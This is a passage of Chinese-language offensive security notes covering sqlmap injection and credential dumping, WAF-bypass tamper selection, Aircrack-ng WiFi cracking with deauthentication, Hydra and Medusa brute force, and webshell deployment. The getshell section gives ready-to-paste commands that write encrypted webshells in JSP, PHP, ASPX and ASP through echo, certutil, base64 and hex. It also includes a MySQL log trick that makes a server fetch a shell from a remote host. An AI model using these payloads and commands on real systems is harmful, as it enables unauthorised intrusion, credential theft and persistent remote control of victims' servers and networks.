mssql众多的储存过程是我们利用的关键,还有很多可能没被提出,需要自己的发现,比如在遇到iis6的拿不了shell还有个上传可以跳目录,不妨试试xp_create_subdir建立个畸形目录解析。
## **工具使用**
### sqlmap
参考:https://blog.csdn.net/qq_33530840/article/details/82144515
#### **sqlmap详细命令参数**
- –is-dba 当前用户权限(是否为root权限)
- –dbs 所有数据库
- –current-db 网站当前数据库
- –users 所有数据库用户
- –current-user 当前数据库用户
- –random-agent 构造随机user-agent
- –passwords 数据库密码
- –proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
- –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
——————————————————————————————————
**Options(选项):**
- –version 显示程序的版本号并退出
- -h, –help 显示此帮助消息并退出
- -v VERBOSE 详细级别:0-6(默认为1)
- 保存进度继续跑:
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存进度
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢复已保存进度
**Target(目标):**
以下至少需要设置其中一个选项,设置目标URL。
- -d DIRECT 直接连接到数据库。
- -u URL, –url=URL 目标URL。
- -l LIST 从Burp或WebScarab代理的日志中解析目标。
- -r REQUESTFILE 从一个文件中载入HTTP请求。
- -g GOOGLEDORK 处理Google dork的结果作为目标URL。
- -c CONFIGFILE 从INI配置文件中加载选项。
**Request(请求):**
这些选项可以用来指定如何连接到目标URL。
- –data=DATA 通过POST发送的数据字符串
- –cookie=COOKIE HTTP Cookie头
- –cookie-urlencode URL 编码生成的cookie注入
- –drop-set-cookie 忽略响应的Set – Cookie头信息
- –user-agent=AGENT 指定 HTTP User – Agent头
- –random-agent 使用随机选定的HTTP User – Agent头
- –referer=REFERER 指定 HTTP Referer头
- –headers=HEADERS 换行分开,加入其他的HTTP头
- –auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
- –auth-cred=ACRED HTTP身份验证凭据(用户名:密码)
- –auth-cert=ACERT HTTP认证证书(key_file,cert_file)
- –proxy=PROXY 使用HTTP代理连接到目标URL
- –proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码)
- –ignore-proxy 忽略系统默认的HTTP代理
- –delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒
- –timeout=TIMEOUT 等待连接超时的时间(默认为30秒)
- –retries=RETRIES 连接超时后重新连接的时间(默认3)
- –scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
- –safe-url=SAFURL 在测试过程中经常访问的url地址
- –safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
**Enumeration(枚举):**
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行
您自己的SQL语句。
- -b, –banner 检索数据库管理系统的标识
- –current-user 检索数据库管理系统当前用户
- –current-db 检索数据库管理系统当前数据库
- –is-dba 检测DBMS当前用户是否DBA
- –users 枚举数据库管理系统用户
- –passwords 枚举数据库管理系统用户密码哈希
- –privileges 枚举数据库管理系统用户的权限
- –roles 枚举数据库管理系统用户的角色
- –dbs 枚举数据库管理系统数据库
- -D DBname 要进行枚举的指定数据库名
- -T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)
- –tables 枚举的DBMS数据库中的表
- –columns 枚举DBMS数据库表列
- –dump 转储数据库管理系统的数据库中的表项
- –dump-all 转储所有的DBMS数据库表中的条目
- –search 搜索列(S),表(S)和/或数据库名称(S)
- -C COL 要进行枚举的数据库列
- -U USER 用来进行枚举的数据库用户
- –exclude-sysdbs 枚举表时排除系统数据库
- –start=LIMITSTART 第一个查询输出进入检索
- –stop=LIMITSTOP 最后查询的输出进入检索
- –first=FIRSTCHAR 第一个查询输出字的字符检索
- –last=LASTCHAR 最后查询的输出字字符检索
- –sql-query=QUERY 要执行的SQL语句
- –sql-shell 提示交互式SQL的shell
**Optimization(优化):**
这些选项可用于优化SqlMap的性能。
- -o 开启所有优化开关
- –predict-output 预测常见的查询输出
- –keep-alive 使用持久的HTTP(S)连接
- –null-connection 从没有实际的HTTP响应体中检索页面长度
- –threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
**Injection(注入):**
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本。
- -p TESTPARAMETER 可测试的参数(S)
- –dbms=DBMS 强制后端的DBMS为此值
- –os=OS 强制后端的DBMS操作系统为这个值
- –prefix=PREFIX 注入payload字符串前缀
- –suffix=SUFFIX 注入payload字符串后缀
- –tamper=TAMPER 使用给定的脚本(S)篡改注入数据
**Detection(检测):**
这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。
- –level=LEVEL 执行测试的等级(1-5,默认为1)
- –risk=RISK 执行测试的风险(0-3,默认为1)
- –string=STRING 查询时有效时在页面匹配字符串
- –regexp=REGEXP 查询时有效时在页面匹配正则表达式
- –text-only 仅基于在文本内容比较网页
**Techniques(技巧):**
这些选项可用于调整具体的SQL注入测试。
- –technique=TECH SQL注入技术测试(默认BEUST)
- –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
- –union-cols=UCOLS 定列范围用于测试UNION查询注入
- –union-char=UCHAR 用于暴力猜解列数的字符
**Fingerprint(指纹):**
- -f, –fingerprint 执行检查广泛的DBMS版本指纹
**Brute force(蛮力):**
这些选项可以被用来运行蛮力检查。
- –common-tables 检查存在共同表
- –common-columns 检查存在共同列
User-defined function injection(用户自定义函数注入):
这些选项可以用来创建用户自定义函数。
–udf-inject 注入用户自定义函数
–shared-lib=SHLIB 共享库的本地路径
**File system access(访问文件系统):**
这些选项可以被用来访问后端数据库管理系统的底层文件系统。
- –file-read=RFILE 从后端的数据库管理系统文件系统读取文件
- –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
- –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
**Operating system access(操作系统访问):**
这些选项可以用于访问后端数据库管理系统的底层操作系统。
- –os-cmd=OSCMD 执行操作系统命令
- –os-shell 交互式的操作系统的shell
- –os-pwn 获取一个OOB shell,meterpreter或VNC
- –os-smbrelay 一键获取一个OOB shell,meterpreter或VNC
- –os-bof 存储过程缓冲区溢出利用
- –priv-esc 数据库进程用户权限提升
- –msf-path=MSFPATH Metasploit Framework本地的安装路径
- –tmp-path=TMPPATH 远程临时文件目录的绝对路径
**Windows注册表访问:**
这些选项可以被用来访问后端数据库管理系统Windows注册表。
- –reg-read 读一个Windows注册表项值
- –reg-add 写一个Windows注册表项值数据
- –reg-del 删除Windows注册表键值
- –reg-key=REGKEY Windows注册表键
- –reg-value=REGVAL Windows注册表项值
- –reg-data=REGDATA Windows注册表键值数据
- –reg-type=REGTYPE Windows注册表项值类型
这些选项可以用来设置一些一般的工作参数。
- -t TRAFFICFILE 记录所有HTTP流量到一个文本文件中
- -s SESSIONFILE 保存和恢复检索会话文件的所有数据
- –flush-session 刷新当前目标的会话文件
- –fresh-queries 忽略在会话文件中存储的查询结果
- –eta 显示每个输出的预计到达时间
- –update 更新SqlMap
- –save file保存选项到INI配置文件
- –batch 从不询问用户输入,使用所有默认配置。
**Miscellaneous(杂项):**
- –beep 发现SQL注入时提醒
- –check-payload IDS对注入payloads的检测测试
- –cleanup SqlMap具体的UDF和表清理DBMS
- –forms 对目标URL的解析和测试形式
- –gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果
- –page-rank Google dork结果显示网页排名(PR)
- –parse-errors 从响应页面解析数据库管理系统的错误消息
- –replicate 复制转储的数据到一个sqlite3数据库
- –tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
- –wizard 给初级用户的简单向导界面
#### sqlmap使用
**使用代理**
可以配合代理池,我之前有发过
```
sqlmap -u “http://www.vuln.cn/post.php?id=1” --proxy “http://127.0.0.1:1080″
```
**检测注入**
```
sqlmap -u “http://www.vuln.cn/post.php?id=1”
```
**cookie注入**
只有level达到2才会检测cookie
```
sqlmap -u “http://www.vuln.cn” –cookie “id=11” --level 2
```
**数据包注入**
```
sqlmap -r “c:\tools\request.txt”
```
**post注入**
```
sqlmap -u "http://www.vuln.cn/post.php?id=1" --method POST --data "id=1"
```
**伪静态注入**
因为+号会被url编码,所以我们通常使用减号来进行判断。
```
http://www.xxxx.com/product/detail/id/3-1.html
```
注入的地方用*号
```
sqlmap.py -u www.xxxx.com/product/detail/id/3*.html --dbms=mysql -v 3
```
**跑库**
--dbms指定数据库
--dbs列出全部数据库
```
sqlmap -u “http://www.vuln.cn/post.php?id=1” --dbms mysql --dbs
```
**跑表**
-D指定数据库(test)
--tables列出该库全部表
```
sqlmap -u “http://www.vuln.cn/post.php?id=1” --dbms mysql -D test --tables
```
**跑列名**
-T指定表(admin)
--columns列出该表全部列名
```
sqlmap -u “http://www.vuln.cn/post.php?id=1” --dbms mysql -D test -T admin –-columns
```
**跑数据**
-C指定列名
--dump跑全部数据
--start 1 --stop 10 跑十条数据
```
sqlmap -u “http://www.vuln.cn/post.php?id=1” --dbms mysql -D test -T admin -C “username,password” --dump
```
**判断是否是管理员**
```
sqlmap -u “http://www.vuln.cn/post.php?id=1” --dbms mysql --is-dba
```
**sqlshell**
获取一个sqlshell,可以用来执行sql语句
```
sqlmap -u “http://www.vuln.cn/post.php?id=1” --sql-shell
```
**用search参数快速定位password列**
```
sqlmap -r “c:\tools\request.txt” –dbms mysql -D test –search -C admin,password
```
**获取shell**
条件:
**(1)网站必须是root权限**
**(2)攻击者需要知道网站的绝对路径**
**(3)GPC为off,php主动转义的功能关闭**
都能上传了,直接传一个一句话不香吗?
```
sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
```
**读取与写入文件**
首先找需要网站的物理路径,其次需要有可写或可读权限。
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的**本地文件** (mssql xp_shell)
–file-dest=DFILE 后端的数据库管理系统写入文件的**绝对路径**
\#写示例:
```
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”
```
#读示例
```
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-read="e:\www\as\config.php"
```
#注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)
#### Tamper使用
这里推一个工具,可以自动选择tamper
https://github.com/m4ll0k/Atlas
**使用**
先用sqlmap 跑一下注入点(需要输出使用的payload)
1. Run SQLMap:
```
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3
```
[![sqlmap](img/68747470733a2f2f692e696d6775722e636f6d2f5850333952717a2e706e67)](https://camo.githubusercontent.com/3f5610b30b3956708d21ae3fa8e8f4333565d4ceb1b51f2a106eeff514229f04/68747470733a2f2f692e696d6775722e636f6d2f5850333952717a2e706e67)
`Price_ASC') AND 8716=4837 AND ('yajr'='yajr` is blocked by WAF/IDS/IPS, now trying with Atlas:
拿到使用的payload,使用atlas.py来查找可用的tamper
```
$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v
```
[![atlas_succ](img/68747470733a2f2f692e696d6775722e636f6d2f553671456e58702e706e67)](https://camo.githubusercontent.com/ec060487c40814c93aecbe7cc7709addd789f65d9b07386f656ea85167709f94/68747470733a2f2f692e696d6775722e636f6d2f553671456e58702e706e67)
找到后,就可以直接使用(上面找到versionedkeywords)
```
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords
```
### Aircrack-ng破解WIFI密码
参考https://blog.csdn.net/qq_36119192/article/details/84254622
破解无线wifi可以分为以下几步:
- 查看网卡名字:iwconfig
- 设置网卡为监听模式:airmon-ng start wlan0
- 扫描附近的WIFI:airodump-ng wlan0mon
- 选定一个路由器,并监听其流量:airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon
- 选定连接的一个客户端,进行攻击:aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31 wlan0mon
- 对抓取到的cap包进行暴力破解:aircrack-ng -w password.txt -b BC:46:99:3D:66:D6 tplink-01.cap
查看无线网卡名字:iwconfig 或者 ifconfig -a 都可以
![img](img/20181119155904820.png)
开启网卡监听模式:airmon-ng start wlan0 。网卡开启了监听模式之后网卡的名字就变为 wlan0mon 了,以后的所有命令中的网卡名都是叫 wlan0mon
![img](img/20181119155959216.png)
扫描附近的WIFI:airodump-ng wlan0mon ,会显示附近所有的WIFI信号。
- BSSID代表路由器的 MAC 地址
- PWR 代表信号的强度,数值越大代表信息越强
- CH 代表信道
- ENC代表用的加密的方式
- AUTH 代表认证的方式
- ESSID是WIFI的名字
我们需要选定一个准备破解的WIFI,我们选 tplink-5
![img](img/20181119160153813.png)
监听该路由器的流量:
```python
airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon # -w 参数指定生成的文件名 -c 指定信道 --bssid指定路由器的MAC地址
```
也可以监听整个信道的路由器流量:
```
airodump-ng -w tplink -c 11 wlan0mon # -w 参数指定生成的文件名 -c 指定信道
```
下面的 STATION 是连接该WIFI的客户端,下面这里只有一个客户端连接了该WIFI。如果有多个客户端连接的话,我们最好选择活跃点的客户端。
![img](img/20181119165219125.png)
重新打开一个命令行窗口(之前的监听不要关闭),开始攻击!之前的窗口继续保留,用于观察是否抓包成功
```python
aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31 wlan0mon # 50是发包的数量 -a指定路由器的MAC地址 -c指定连接的客户端的MAC地址
```
该命令会打断连接客户端和WIFI之间的连接,等到客户端重新连接WIFI的时候,就会抓取他们之间的握手认证包!
![img](img/20181119164552615.png)
如果在监听窗口看到下面红色圈住的这些,就说明握手包抓取成功了(没抓到可以多试几次,直到抓包成功为止)
![img](img/20181119164947823.png)
我们可以看到会生成四个文件,其中我们有用的文件是以 cap 后缀结尾的文件
![img](img/20181119165829983.png)
对抓取到的cap包进行破解,这需要我们准备好破解的密码字典。所以,无论是任何破解,都需要一个强大的密码字典!
kali下自带有一份无线密码字典——> /usr/share/wordlists/rockyou.txt.gz ,我们将其解压
![img](img/20190519130854576.png)
![img](img/2019051913123037.png)
```python
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b BC:46:99:3D:66:D6 tplink-01.cap #-w指定 密码字典 -b指定路由器的MAC地址
```
可以看到,破解成功!该WIFI的密码为 www.123.com
![img](img/2018111916443643.png)
从最后可以看出,要想破解出WIFI的密码,还是得需要一个很强大的字典!
### 爆破攻击
#### Hydra
```
参数:
-l 指定的用户名 -L 用户名字典
-p 指定密码 -P 密码字典
-s 指定端口
-o 输出文件
-t 任务数默认16
-f 爆破成功一个就停止
-v 报错日志详细 -V 攻击日志
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 smb -vV
>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10
```
#### Medusa
```
参数:
-h 目标名或IP -H 目标列表
-u 用户名 -U 用户名字典
-p 密码 -P 密码字典 -f 爆破成功停止 -M 指定服务 -t 线程
-n 指定端口 -e ns 尝试空密码和用户名密码相同
>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql
```
# getshell方法
## 利用JavaScript转写php
https://xz.aliyun.com/t/9181
为了避免拦截php代码的waf,我这里远程下载的脚本是利用JavaScript转写php
```sql
SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';
SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'
```
访问11.php 就会生成shell.php
这里的shell也是用了哥斯拉的免杀shell
## 命令执行写shell
```
echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php
echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php
```
https://www.anquanke.com/post/id/245019
**Windows**
在windows主要的写入方法,我主要用以下两种:
```
set /p=要写的内容<nul > C:\11.txt
echo 要写的内容 > C:\11.txt
```
在windows中,批处理需要转义字符主要有 “&”,“|”,“<”,“>”等等,转义字符为”^”
下面以echo为例,写入冰蝎各脚本语言shell,其中需要转义的东西,我已经帮各位表哥转过了,拿来直接用即可:
**(1)jsp**
```
echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^>^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^>^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> > 111.jsp
```
**(2)jspx**
```
echo ^<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"^>^<jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/^>^<jsp:declaration^> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}^</jsp:declaration^>^<jsp:scriptlet^>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);^</jsp:scriptlet^>^</jsp:root^> > 111.jspx
```
**(3)php**
```
echo ^<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl'))^{$t="base64_"."decode";$post=$t($post."");for($i=0;$i^<strlen($post);$i++) ^{$post[$i] = $post[$i]^^$key[$i+1^&15]; ^}^}else^{$post=openssl_decrypt($post, "AES128", $key);^}$arr=explode('^|',$post);$func=$arr[0];$params=$arr[1];class C^{public function __invoke($p) ^{eval($p."");^}^}@call_user_func(new C(),$params);?^> > 111.php
```
**(4)java9 jsp**
```
echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^>^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^>^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b"; session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> > 111.jsp
```
**(5)aspx**
```
echo ^<%@ Page Language="C#" %^>^<%@Import Namespace="System.Reflection"%^>^<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%^> > 111.aspx
```
**(6)asp**
```
echo ^<% >> 111.asp&echo Response.CharSet = "UTF-8" >> 111.asp&echo k="e45e329feb5d925b" >> 111.asp&echo Session("k")=k >> 111.asp&echo size=Request.TotalBytes >> 111.asp&echo content=Request.BinaryRead(size) >> 111.asp&echo For i=1 To size >> 111.asp&echo result=result^&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1))) >> 111.asp&echo Next >> 111.asp&echo execute(result) >> 111.asp&echo %^> >> 111.asp
```
**(1)certutil-Base64**
```
echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTt9JT4= > 111.txt
certutil -f -decode 111.txt C:\\111.jsp
```
**(2)certutil-Hex**
```
echo 3c25407061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a22253e3c2521636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d253e3c2569662028726571756573742e6765744d6574686f6428292e657175616c732822504f53542229297b537472696e67206b3d2265343565333239666562356439323562223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563286b2e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b7d253e > 111.txt
certutil -decodehex 111.txt C:\\111.jsp
```
**(b)Linux**
在Linux中,需要转义字符主要是 单引号 或者双引号 对于单引号,我们将其替换为\47即可。
**(1)jsp**
```
echo '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' > 111.jsp
```
**(2)jspx**
```
echo '<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root>' > 111.jspx
```
**(3)php**
```
echo -e '<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION[\047k\047]=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded(\047openssl\047)){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode(\047|\047,$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);?> ' > 111.php
```
**(4)aspx**
```
echo '<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>' > 111.aspx
```
**(5)asp**
```
echo -e '<%\nResponse.CharSet = "UTF-8" \nk="e45e329feb5d925b" \nSession("k")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>' > 111.asp
```
**Linux**
和windows不同,linux在途中就已经转换完毕,落地文件已经成为shell。大部分玩家都是懒得转义shell中的字符,而使用下面的方法。主要也是分base64以及hex两种。
**(1)jsp**
```
echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTt9JT4= |base64 -d > 111.jsp
echo 3c25407061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a22253e3c2521636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d253e3c2569662028726571756573742e6765744d6574686f6428292e657175616c732822504f53542229297b537472696e67206b3d2265343565333239666562356439323562223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563286b2e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b7d253e|xxd -r -ps > 111.jsp
```
**(2)jspx**
```
echo PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgdmVyc2lvbj0iMS4yIj48anNwOmRpcmVjdGl2ZS5wYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YXguY3J5cHRvLiosamF2YXguY3J5cHRvLnNwZWMuKiIvPjxqc3A6ZGVjbGFyYXRpb24+IGNsYXNzIFUgZXh0ZW5kcyBDbGFzc0xvYWRlcntVKENsYXNzTG9hZGVyIGMpe3N1cGVyKGMpO31wdWJsaWMgQ2xhc3MgZyhieXRlIFtdYil7cmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsMCxiLmxlbmd0aCk7fX08L2pzcDpkZWNsYXJhdGlvbj48anNwOnNjcmlwdGxldD5TdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYygoc2Vzc2lvbi5nZXRWYWx1ZSgidSIpKyIiKS5nZXRCeXRlcygpLCJBRVMiKSk7bmV3IFUodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLmcoYy5kb0ZpbmFsKG5ldyBzdW4ubWlzYy5CQVNFNjREZWNvZGVyKCkuZGVjb2RlQnVmZmVyKHJlcXVlc3QuZ2V0UmVhZGVyKCkucmVhZExpbmUoKSkpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7PC9qc3A6c2NyaXB0bGV0PjwvanNwOnJvb3Q+|base64 -d > 111.jsp
